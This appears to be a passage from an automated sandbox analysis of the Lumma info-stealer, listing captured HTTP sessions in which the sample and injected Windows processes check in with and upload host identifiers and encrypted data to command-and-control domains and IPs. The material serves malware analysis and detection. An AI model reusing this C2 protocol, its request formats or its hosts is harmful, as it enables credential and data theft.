23	192.168.2.4	62289	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:33 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: liernessfornicsa.shop
2024-07-27 05:44:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-27 05:44:33 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ssudpefrkd7ir907qm1c67vqn2; expires=Tue, 19-Nov-2024 23:31:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okQ8WxGkvExxpE8NhHUVaZSXU7B9sYd4Qwx5TB7VAj42rkdauHwTD7IhMno604lkRbtct89lKPUDsPjxA8%2BCTkgrgzXpwfyXay7vz71PsjYMEQzh2LqHdCj%2BpScDYO7PCoF08pjkq34%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a517a69b00ce1-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-27 05:44:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	62291	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:34 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:34 UTC	1122	OUT	Data Raw: 4e 5a 52 45 44 59 59 39 44 41 4d 62 78 50 39 48 6d 56 4c 55 72 49 4d 4a 69 39 31 32 6a 50 4d 45 73 52 41 42 6c 48 36 77 41 61 71 51 59 4f 4e 55 6e 4f 73 70 47 47 33 2f 77 6d 47 30 6c 66 37 4b 62 7a 38 78 65 54 79 34 70 78 72 41 58 55 51 57 5a 36 52 32 43 59 51 4a 74 7a 6f 6e 78 67 4d 7a 47 6b 4d 39 32 72 30 4c 67 61 76 6d 6e 37 70 76 45 4f 4c 35 4b 6a 72 47 71 65 64 54 6c 41 45 46 46 61 67 6d 53 75 66 48 37 75 33 72 4b 66 52 6d 50 4d 64 5a 49 45 4c 69 71 5a 6c 53 4e 64 54 4b 2f 54 4d 34 41 64 4d 4a 35 71 61 72 44 2b 4f 4a 72 5a 70 49 35 63 30 50 38 47 34 4f 79 53 53 4e 33 43 32 33 58 2b 68 77 66 61 57 39 42 4a 57 73 4b 37 39 6b 6e 43 4f 64 53 61 6c 72 38 4b 51 55 38 79 47 31 54 6b 4f 5a 49 2b 67 47 2f 6e 42 77 47 65 77 65 36 71 44 39 42 73 74 55 79 33 64 Data Ascii: NZREDYY9DAMbxP9HmVLUrIMJi912jPMEsRABlH6wAaqQYONUnOspGG3/wmG0lf7Kbz8xeTy4pxrAXUQWZ6R2CYQJtzonxgMzGkM92r0Lgavmn7pvEOL5KjrGqedTlAEFFagmSufH7u3rKfRmPMdZIELiqZlSNdTK/TM4AdMJ5qarD+OJrZpI5c0P8G4OySSN3C23X+hwfaW9BJWsK79knCOdSalr8KQU8yG1TkOZI+gG/nBwGewe6qD9BstUy3d
2024-07-27 05:44:36 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:36 UTC	685	IN	Data Raw: 41 64 6f 64 46 64 75 6a 51 5a 39 50 78 52 72 55 47 4b 67 50 68 4f 4e 77 5a 6d 57 77 56 55 6f 4f 54 6e 55 50 4a 73 36 37 66 68 45 4b 57 75 68 72 30 50 43 4a 65 56 44 63 69 66 2b 4b 34 48 6e 52 4c 67 62 54 36 4c 59 31 75 6b 75 76 47 56 7a 4b 34 63 30 34 31 53 6c 6c 72 73 74 66 4a 44 42 4a 71 32 78 4a 33 35 65 68 73 38 2b 37 6a 32 33 30 6f 4f 67 2b 39 37 6d 79 45 4d 36 79 69 71 52 39 57 2b 70 41 4d 71 64 6d 53 69 6d 47 65 61 59 66 4a 51 4d 54 71 51 35 2b 64 38 5a 6c 36 78 53 64 42 6e 68 2b 43 2f 45 71 6b 38 6a 41 46 67 47 49 2b 47 7a 46 5a 77 4b 38 7a 53 6c 33 46 63 77 56 71 68 4d 73 53 67 6a 35 4f 32 70 77 2b 6b 4a 5a 49 6b 33 63 65 4e 71 70 2f 68 70 78 63 34 32 41 52 77 4c 4d 44 68 69 6d 4f 59 77 37 68 35 74 69 79 6d 6a 68 6c 45 71 72 62 61 47 32 78 41 49 Data Ascii: AdodFdujQZ9PxRrUGKgPhONwZmWwVUoOTnUPJs67fhEKWuhr0PCJeVDcif+K4HnRLgbT6LY1ukuvGVzK4c041SllrstfJDBJq2xJ35ehs8+7j230oOg+97myEM6yiqR9W+pAMqdmSimGeaYfJQMTqQ5+d8Zl6xSdBnh+C/Eqk8jAFgGI+GzFZwK8zSl3FcwVqhMsSgj5O2pw+kJZIk3ceNqp/hpxc42ARwLMDhimOYw7h5tiymjhlEqrbaG2xAI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	62290	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:34 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: liernessfornicsa.shop
2024-07-27 05:44:34 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=qToYrJ--&j=
2024-07-27 05:44:35 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lnok6vtgpskjqdek2r21ts6696; expires=Tue, 19-Nov-2024 23:31:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYt0e6OwXOczfZjuBnvARJSsmQ9D6cAqQARj%2FkVYaRnZbww2hlkda5tGE8nJHkihsR%2FD1qvgx34k9JaqYUz8kFR3wQjmLKugGZrp6Hk9vucMuXAZiL8WPOfVncJWBZsDBNXyxuqb9ZQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a5181ca530f79-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:35 UTC	565	IN	Data Raw: 31 64 39 39 0d 0a 79 61 45 57 4b 51 55 53 71 4c 72 67 48 34 39 6d 31 4b 7a 6b 30 65 4f 41 4c 73 6a 2b 7a 47 79 42 35 67 61 61 39 5a 67 6a 78 58 65 79 67 32 41 4c 50 79 61 45 6d 4a 4e 36 72 56 79 67 33 70 47 30 7a 36 4a 50 72 4e 7a 32 43 75 43 4b 64 66 2f 5a 75 6c 57 6f 56 66 50 48 64 30 56 32 64 34 53 59 68 57 65 74 58 49 2f 58 78 72 53 4e 6f 68 54 71 6d 36 59 4f 34 49 70 6b 2b 35 37 33 55 36 6b 55 6f 63 31 78 51 57 42 78 7a 4e 75 4d 63 75 6f 44 73 63 32 4f 76 34 72 74 52 71 58 63 34 45 37 6b 6e 43 53 67 31 39 56 47 73 52 61 45 77 47 56 43 4a 32 2b 45 77 63 4a 36 34 55 54 75 6a 6f 57 30 67 65 78 49 72 4a 57 6b 42 4f 6d 43 5a 66 36 66 36 45 71 6a 48 36 48 44 63 6b 42 71 65 4e 6a 57 68 6e 58 68 42 62 76 4e 78 76 33 42 35 56 54 71 78 4f 35 64 30 59 64 31 36 Data Ascii: 1d99yaEWKQUSqLrgH49m1Kzk0eOALsj+zGyB5gaa9ZgjxXeyg2ALPyaEmJN6rVyg3pG0z6JPrNz2CuCKdf/ZulWoVfPHd0V2d4SYhWetXI/XxrSNohTqm6YO4Ipk+573U6kUoc1xQWBxzNuMcuoDsc2Ov4rtRqXc4E7knCSg19VGsRaEwGVCJ2+EwcJ64UTujoW0gexIrJWkBOmCZf6f6EqjH6HDckBqeNjWhnXhBbvNxv3B5VTqxO5d0Yd16
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 49 61 58 37 4e 7a 73 4a 69 6f 78 33 32 79 59 72 7a 32 61 4a 43 72 35 4f 38 44 2f 47 42 61 75 71 62 2f 30 65 71 46 71 58 44 63 55 78 71 66 73 7a 66 67 58 58 70 42 62 6a 43 6a 4c 43 46 34 51 7a 6b 33 4b 6b 57 6f 39 77 6b 79 5a 54 2b 52 72 55 57 70 59 4e 72 42 58 34 77 7a 64 54 43 4a 61 30 4f 73 4d 4f 50 75 49 62 71 51 4c 69 58 6f 51 33 71 67 32 4c 79 6c 50 4a 4c 6f 52 75 71 78 48 46 4d 64 58 37 42 31 59 46 33 36 30 54 34 6a 6f 47 72 77 62 6f 4d 68 4a 2b 2f 47 4e 47 48 64 65 6e 58 35 51 2b 2b 56 61 7a 50 4e 42 4d 6e 65 63 4c 58 6a 33 44 6e 43 72 50 44 6a 37 4b 41 37 30 71 68 6e 61 59 47 35 34 4e 6b 2f 4a 72 31 54 36 63 62 6f 38 5a 77 51 57 34 77 68 4a 69 46 5a 61 31 63 39 76 36 4c 76 34 72 75 44 70 2b 66 6f 41 44 6b 6b 69 54 6e 32 65 4d 42 6f 42 6e 72 6d 7a Data Ascii: IaX7NzsJiox32yYrz2aJCr5O8D/GBauqb/0eqFqXDcUxqfszfgXXpBbjCjLCF4Qzk3KkWo9wkyZT+RrUWpYNrBX4wzdTCJa0OsMOPuIbqQLiXoQ3qg2LylPJLoRuqxHFMdX7B1YF360T4joGrwboMhJ+/GNGHdenX5Q++VazPNBMnecLXj3DnCrPDj7KA70qhnaYG54Nk/Jr1T6cbo8ZwQW4whJiFZa1c9v6Lv4ruDp+foADkkiTn2eMBoBnrmz
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 78 39 79 46 66 4b 31 4b 39 73 6d 65 38 39 6d 69 65 72 71 52 6f 69 44 6f 69 47 32 34 69 4c 52 59 35 78 4b 6e 67 79 77 4c 59 33 7a 43 30 6f 31 30 35 77 36 35 78 34 61 37 69 4f 74 50 71 70 43 6f 44 2b 2b 49 61 66 32 55 2f 30 79 69 46 61 66 45 63 30 6f 6e 50 6f 72 66 6d 6a 32 31 52 49 62 44 69 72 69 4e 6f 48 6d 70 6b 71 41 4a 39 63 52 37 74 6f 36 36 52 71 74 56 38 34 4e 37 53 6d 70 36 77 64 61 4f 66 4f 30 41 74 63 53 47 76 49 54 6b 52 4b 4f 63 76 41 6e 73 68 57 58 7a 6e 50 64 50 6f 68 53 75 78 44 51 46 4a 33 66 53 6d 4e 6f 39 77 43 32 4d 6a 70 6e 39 6d 4b 4a 4c 70 74 7a 32 54 75 65 4f 5a 50 57 64 38 55 36 6b 45 71 58 44 65 55 46 31 65 4d 72 59 6a 48 76 73 43 4c 50 50 69 72 43 54 37 6b 71 6e 6d 71 59 63 6f 38 6f 6b 2f 34 2b 36 47 65 63 31 6f 4d 39 33 52 32 5a Data Ascii: x9yFfK1K9sme89mierqRoiDoiG24iLRY5xKngywLY3zC0o105w65x4a7iOtPqpCoD++Iaf2U/0yiFafEc0onPorfmj21RIbDiriNoHmpkqAJ9cR7to66RqtV84N7Smp6wdaOfO0AtcSGvITkRKOcvAnshWXznPdPohSuxDQFJ3fSmNo9wC2Mjpn9mKJLptz2TueOZPWd8U6kEqXDeUF1eMrYjHvsCLPPirCT7kqnmqYco8ok/4+6Gec1oM93R2Z
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 6e 76 69 44 61 54 4e 69 72 32 47 37 45 43 6b 6b 61 51 4e 37 73 51 71 75 4a 44 69 41 66 39 56 68 38 52 35 5a 57 78 38 7a 5a 69 64 4d 2f 52 45 73 63 4c 47 36 38 48 75 52 71 61 56 72 67 66 6d 6a 47 2f 78 6b 76 74 4b 6f 68 61 74 7a 6e 74 43 64 58 72 4a 31 6f 46 78 34 51 4b 33 7a 5a 53 37 69 4b 49 43 36 70 75 32 54 72 76 45 52 66 61 61 37 6b 61 33 56 62 53 4e 62 51 74 67 66 49 71 41 77 6e 37 73 43 37 58 50 69 37 57 49 36 6b 79 73 6d 61 45 44 37 59 4e 6a 2b 4a 72 30 54 71 45 64 70 73 39 2f 52 57 35 32 79 74 6d 49 50 61 4e 45 73 64 62 47 36 38 48 53 54 36 71 63 74 55 37 38 79 6e 32 34 6b 50 59 42 2f 31 57 35 79 58 31 4c 5a 48 2f 4e 33 49 6c 78 36 41 47 35 7a 59 2b 32 69 4f 78 65 6f 35 4b 6d 42 75 79 42 62 2f 69 61 38 45 32 6e 46 75 75 4e 4e 45 78 2f 4d 4a 4b 59 Data Ascii: nviDaTNir2G7ECkkaQN7sQquJDiAf9Vh8R5ZWx8zZidM/REscLG68HuRqaVrgfmjG/xkvtKohatzntCdXrJ1oFx4QK3zZS7iKIC6pu2TrvERfaa7ka3VbSNbQtgfIqAwn7sC7XPi7WI6kysmaED7YNj+Jr0TqEdps9/RW52ytmIPaNEsdbG68HST6qctU78yn24kPYB/1W5yX1LZH/N3Ilx6AG5zY+2iOxeo5KmBuyBb/ia8E2nFuuNNEx/MJKY
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 4b 6b 79 49 6d 36 67 75 46 46 72 5a 53 69 42 4f 43 44 4a 4c 62 58 2f 56 6e 6e 54 65 76 67 59 31 74 71 4d 4e 57 57 6d 7a 33 71 43 50 61 57 78 72 75 4d 36 6b 61 75 6d 36 4d 4a 35 59 31 32 38 5a 4c 30 51 61 4d 65 70 4d 56 77 53 47 64 69 7a 4e 79 4b 66 75 41 4a 75 4d 32 43 38 38 2b 69 53 37 4c 63 39 6b 37 52 69 57 72 6a 6d 50 31 51 72 56 57 30 6a 57 30 4c 59 48 79 4b 67 4d 4a 35 34 78 61 39 7a 34 32 34 6a 2b 56 44 72 35 61 75 41 65 65 48 61 76 4f 57 2b 55 6d 71 47 4b 58 4a 66 55 4a 67 66 4d 37 66 77 6a 4f 74 41 36 36 4f 33 76 4f 71 77 32 47 47 6d 37 52 4f 2f 4d 70 39 75 4a 44 32 41 66 39 56 70 38 70 34 51 57 78 33 77 4e 61 4c 63 2b 59 57 70 4d 32 43 73 49 6a 68 53 36 4f 53 72 67 6e 6d 69 6d 50 35 6e 50 35 4c 70 42 50 72 6a 54 52 4d 66 7a 43 53 6d 4b 35 2b 37 Data Ascii: KkyIm6guFFrZSiBOCDJLbX/VnnTevgY1tqMNWWmz3qCPaWxruM6kaum6MJ5Y128ZL0QaMepMVwSGdizNyKfuAJuM2C88+iS7Lc9k7RiWrjmP1QrVW0jW0LYHyKgMJ54xa9z424j+VDr5auAeeHavOW+UmqGKXJfUJgfM7fwjOtA66O3vOqw2GGm7RO/Mp9uJD2Af9Vp8p4QWx3wNaLc+YWpM2CsIjhS6OSrgnmimP5nP5LpBPrjTRMfzCSmK5+7
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 44 75 59 44 6c 52 4b 65 4f 72 51 48 73 67 47 54 33 6b 66 78 41 71 42 4f 73 79 6e 56 44 59 44 43 45 6d 49 56 6c 72 56 7a 32 34 49 47 77 68 61 4a 54 35 49 58 75 43 65 2f 45 50 4c 69 58 38 45 75 74 47 36 76 45 5a 6b 31 75 63 4d 6e 4b 67 58 76 6c 41 72 72 43 69 37 75 49 34 6b 6d 68 6b 61 55 44 35 59 52 76 2b 64 65 30 41 61 41 4e 36 35 73 30 65 6d 70 2b 7a 74 61 42 62 65 70 45 71 59 43 66 38 34 62 75 44 50 4c 63 6f 51 66 78 67 32 48 77 6e 76 70 50 72 68 79 73 78 33 64 4b 59 33 7a 46 30 59 46 31 37 41 79 35 7a 59 61 34 69 65 68 4e 70 4a 6e 75 51 4b 4f 44 66 4c 6a 50 75 6d 36 6b 45 4b 44 43 4e 6d 78 68 64 38 61 59 6e 54 50 30 52 4c 48 43 78 75 76 42 34 55 69 6b 6c 61 45 4b 36 59 4e 6b 2f 35 48 36 53 61 77 59 6f 4e 46 78 52 57 4a 78 79 74 6d 4e 63 65 30 57 73 38 Data Ascii: DuYDlRKeOrQHsgGT3kfxAqBOsynVDYDCEmIVlrVz24IGwhaJT5IXuCe/EPLiX8EutG6vEZk1ucMnKgXvlArrCi7uI4kmhkaUD5YRv+de0AaAN65s0emp+ztaBbepEqYCf84buDPLcoQfxg2HwnvpPrhysx3dKY3zF0YF17Ay5zYa4iehNpJnuQKODfLjPum6kEKDCNmxhd8aYnTP0RLHCxuvB4UiklaEK6YNk/5H6SawYoNFxRWJxytmNce0Ws8
2024-07-27 05:44:35 UTC	175	IN	Data Raw: 33 48 4b 45 6d 36 67 4c 35 4a 51 6d 31 70 7a 75 52 75 64 62 36 38 77 30 45 31 34 77 67 70 69 39 4d 36 30 63 39 70 62 47 68 6f 4c 73 51 71 32 4b 76 30 50 4e 67 32 4c 39 6b 4f 6f 44 69 52 36 2f 78 44 51 46 4a 33 61 4b 67 4e 49 7a 72 51 43 6e 6a 74 37 6a 30 37 6b 5a 2b 63 76 2b 58 50 7a 4b 66 62 69 42 75 68 6e 31 57 2b 76 52 4e 42 4d 6e 4e 38 6e 4b 6b 48 76 75 45 72 57 4a 75 49 32 43 39 45 47 6c 6c 36 38 77 33 61 70 70 2b 5a 54 30 41 35 59 44 70 74 4e 33 54 6d 42 4f 39 4e 61 46 61 65 6f 4b 73 4d 37 47 2f 63 48 74 44 0d 0a Data Ascii: 3HKEm6gL5JQm1pzuRudb68w0E14wgpi9M60c9pbGhoLsQq2Kv0PNg2L9kOoDiR6/xDQFJ3aKgNIzrQCnjt7j07kZ+cv+XPzKfbiBuhn1W+vRNBMnN8nKkHvuErWJuI2C9EGll68w3app+ZT0A5YDptN3TmBO9NaFaeoKsM7G/cHtD
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 32 34 38 37 0d 0a 50 4b 6c 37 6b 61 6a 75 79 71 34 6a 37 6f 5a 35 79 43 6f 7a 58 70 4d 63 57 47 48 2b 35 52 77 34 67 2b 33 6a 73 6a 7a 68 36 49 55 2b 74 4c 75 43 76 4c 45 50 4b 6a 46 6f 52 54 30 51 76 75 52 61 77 56 2b 4d 4e 79 59 32 69 2b 6a 52 4b 53 4f 33 76 50 47 37 45 47 72 6e 36 41 4e 38 5a 5a 69 2b 34 48 35 42 70 6b 72 69 73 35 2f 52 32 70 2f 77 65 61 38 58 4f 41 50 75 73 4f 4a 75 4c 2f 63 57 61 6d 53 6f 41 6e 31 6c 53 53 32 31 2f 55 42 2f 79 7a 72 69 7a 52 30 4b 54 44 53 6d 4e 6f 39 32 41 65 34 77 49 47 6c 6b 4b 39 74 70 35 65 69 41 2b 79 50 4a 4c 62 58 2f 41 48 2f 52 65 57 44 63 46 6f 6e 4b 4a 71 4b 32 53 69 2b 55 2b 61 63 6d 66 32 59 6f 6c 72 71 78 50 78 41 6f 35 59 6b 6f 4e 65 39 51 72 55 48 72 63 42 69 53 43 42 4f 39 50 75 56 61 2b 63 66 39 4f Data Ascii: 2487PKl7kajuyq4j7oZ5yCozXpMcWGH+5Rw4g+3jsjzh6IU+tLuCvLEPKjFoRT0QvuRawV+MNyY2i+jRKSO3vPG7EGrn6AN8ZZi+4H5Bpkris5/R2p/wea8XOAPusOJuL/cWamSoAn1lSS21/UB/yzrizR0KTDSmNo92Ae4wIGlkK9tp5eiA+yPJLbX/AH/ReWDcFonKJqK2Si+U+acmf2YolrqxPxAo5YkoNe9QrUHrcBiSCBO9PuVa+cf9O
2024-07-27 05:44:35 UTC	1369	IN	Data Raw: 38 6b 71 70 33 4f 42 4f 35 63 51 38 71 4e 6d 36 52 62 5a 56 38 35 4d 6d 45 44 49 6a 6e 59 6a 51 59 71 4d 64 39 74 6a 47 36 39 4f 73 44 4c 6a 63 39 6b 36 6b 68 33 62 71 6b 66 6c 58 70 46 4b 56 2f 56 4a 49 64 6e 72 72 31 5a 4a 36 30 7a 71 6a 7a 59 69 39 68 76 52 64 36 74 4c 75 41 61 50 63 58 62 6a 66 74 6b 65 6b 41 2b 76 38 4f 67 74 2f 4d 4a 4b 59 74 33 37 6a 43 72 48 59 6c 2f 36 6e 34 56 32 67 76 61 4d 65 35 4d 51 71 75 4a 47 36 47 66 52 62 36 38 64 6c 43 7a 38 67 6d 49 50 58 4c 72 70 55 35 4e 48 49 71 73 48 30 44 50 4c 4f 34 45 37 78 78 44 79 34 30 50 6c 54 74 52 4f 6f 31 58 63 4d 57 55 37 2f 32 34 78 7a 36 68 4b 44 7a 5a 65 77 67 65 6c 79 6c 4c 32 67 42 65 53 49 63 73 61 70 7a 30 4b 70 47 36 7a 56 5a 51 73 70 4d 4d 57 59 32 6b 53 74 54 50 62 78 79 50 4f Data Ascii: 8kqp3OBO5cQ8qNm6RbZV85MmEDIjnYjQYqMd9tjG69OsDLjc9k6kh3bqkflXpFKV/VJIdnrr1ZJ60zqjzYi9hvRd6tLuAaPcXbjftkekA+v8Ogt/MJKYt37jCrHYl/6n4V2gvaMe5MQquJG6GfRb68dlCz8gmIPXLrpU5NHIqsH0DPLO4E7xxDy40PlTtROo1XcMWU7/24xz6hKDzZewgelylL2gBeSIcsapz0KpG6zVZQspMMWY2kStTPbxyPO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	62292	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:35 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1281 Host: callosallsaospz.shop
2024-07-27 05:44:35 UTC	1281	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:44:36 UTC	818	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7ks6a6988mok4ejr6lba41d8pk; expires=Tue, 19-Nov-2024 23:31:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N0%2BQ89cddYmWSr7HigFUcuwAiRLuOi8rIAaVmHMCXZVmmnjZ5uL%2Bhw9RNe1%2FuSfamspt6dwaKcdR9NrogsMUm%2F7XApsSK0tlhs%2F6r5a8xHOZT%2Bjuw%2BjE9LuROdgfCHjQNbAt%2FCjM2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a5184ed860f41-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:36 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	62294	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:36 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:36 UTC	1267	OUT	Data Raw: 62 75 34 30 39 30 5a 62 75 56 32 65 50 7a 71 2b 39 52 6c 2f 79 6a 4a 50 33 2b 43 38 7a 6b 4e 55 51 6c 64 71 7a 4d 7a 36 69 66 2f 58 36 69 74 39 58 6d 6f 65 4b 36 34 30 64 44 50 78 49 4c 4b 48 47 77 54 68 78 41 76 4a 79 6e 59 5a 58 32 37 42 4d 50 32 2b 4f 39 68 58 6d 2f 35 55 71 55 50 67 41 69 58 51 4f 72 38 70 45 34 64 31 2b 57 48 79 59 47 45 41 6d 34 65 49 43 75 30 52 31 58 71 32 37 54 66 79 59 51 2f 65 32 58 51 4d 5a 6b 49 73 64 77 78 52 42 35 37 2b 4e 6b 75 30 5a 70 7a 43 49 47 52 2f 50 4f 2f 31 72 75 6c 72 6c 6c 59 59 50 48 64 4c 34 70 4c 35 41 52 77 68 79 38 50 39 47 4c 47 34 61 6d 70 57 2b 57 57 47 41 55 31 67 56 4d 45 46 7a 71 72 64 41 42 69 6c 44 6a 34 4b 44 7a 45 39 32 6b 4c 6a 74 51 38 52 6c 6d 6f 46 69 5a 65 58 57 66 61 32 30 43 70 71 72 62 30 Data Ascii: bu4090ZbuV2ePzq+9Rl/yjJP3+C8zkNUQldqzMz6if/X6it9XmoeK640dDPxILKHGwThxAvJynYZX27BMP2+O9hXm/5UqUPgAiXQOr8pE4d1+WHyYGEAm4eICu0R1Xq27TfyYQ/e2XQMZkIsdwxRB57+Nku0ZpzCIGR/PO/1rulrllYYPHdL4pL5ARwhy8P9GLG4ampW+WWGAU1gVMEFzqrdABilDj4KDzE92kLjtQ8RlmoFiZeXWfa20Cpqrb0
2024-07-27 05:44:38 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:38 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:38 UTC	685	IN	Data Raw: 67 41 61 2b 62 57 6b 77 45 30 52 53 6c 37 75 57 77 6e 57 65 45 42 63 49 53 48 46 53 68 75 2f 77 43 6d 70 42 47 54 56 71 2b 51 4f 6b 47 31 44 51 6f 38 66 4f 64 52 6a 2f 6b 62 39 52 34 66 4d 4b 2f 64 2b 51 59 63 34 73 31 69 62 54 78 31 50 50 71 77 63 4f 45 4e 68 52 59 6d 4c 57 71 43 45 53 58 78 43 6b 6f 6f 4b 63 65 52 76 31 57 4b 35 42 57 5a 4d 65 72 34 63 61 33 4a 36 30 62 35 47 36 71 54 39 46 4b 31 36 32 57 43 57 53 52 42 53 4c 39 41 68 71 72 79 48 51 2f 46 47 56 41 6b 61 47 31 2b 4f 35 30 73 45 6f 4a 4a 50 76 67 54 44 2f 2b 6b 34 78 71 6a 58 6d 63 65 57 6e 4f 77 58 59 34 72 75 5a 70 52 76 4b 55 62 77 63 39 38 6c 33 51 69 79 71 70 35 48 6c 6b 4c 65 67 47 61 75 63 66 76 4b 33 6f 79 6b 57 43 38 70 7a 6b 4e 51 69 67 64 44 46 65 71 77 6c 72 